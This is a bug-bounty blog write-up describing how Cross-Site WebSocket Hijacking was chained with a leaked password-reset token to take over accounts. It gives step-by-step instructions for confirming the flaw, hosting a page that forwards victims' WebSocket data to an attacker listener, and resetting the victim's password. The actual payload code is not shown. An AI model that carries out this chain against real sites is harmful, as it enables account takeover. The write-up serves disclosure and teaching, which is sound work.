Account Takeover Using Cross-Site WebSocket Hijacking (CSWH)

Sharan Panegav
Mar 9, 2019 · 3 min read

Hello ,

While Hunting on a private program. I found the application using WebSocket connection so I checked the WebSocket URL and I found it was vulnerable to CSWH(Cross-site websocket-hijacking)

for more details about CSWH you can go through below blog

  1. https://www.christian-schneider.net/CrossSiteWebSocketHijacking.html

So let’s assume an application is an establishing connection with websocket on URL wss://website.com. to verify the URL is vulnerable to CSWH I follow below steps

  1. Open the web application on browser and login into it.
  2. After this visit, http://websocket.org/echo.html in a new tab, enter the WebSocket URL and click ‘Connect’.
  3. Once the connection is established you must be able to send frames to the server from this page. Capture the websocket frames using burp proxy from a valid session and send them to see how the server responds. If the server responds in the same way as it did for the valid session then it most likely is vulnerable to Cross-Site WebSocket Hijacking

By following above steps I determined the application is vulnerable to Cross-site-websocket-Hijacking.

Once I established the WebSocket connection on the new tab I have received below websocket response

If you observe the above response, there is parameter “forgotPasswordId” and its value is “null”.

Now need to determine the value of “_forgotPasswordId” to complete the attack I decided to check the forgot password page and submitted the password reset request.

Once again I checked the Websocket connection and this time observed the below Response and it contains forgotPassword token

Exploit :

Now to prepare the exploit of account takeover need to chain CSWH and password reset request. So I prepared below payload to send WebSocket response the attacker site using XHR.

Steps:

  1. Send Password reset link to Victim (Using Forgot password page)
  2. Host the Above CSWH.html and Send URL to Vitim (Similar to CSRF attacks)
  3. Once victim click on URL you will get websocket response on your listener as show in below Image
Response on Webhook Listener of attacker

Once we have forgot password token we can reset the victim password

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store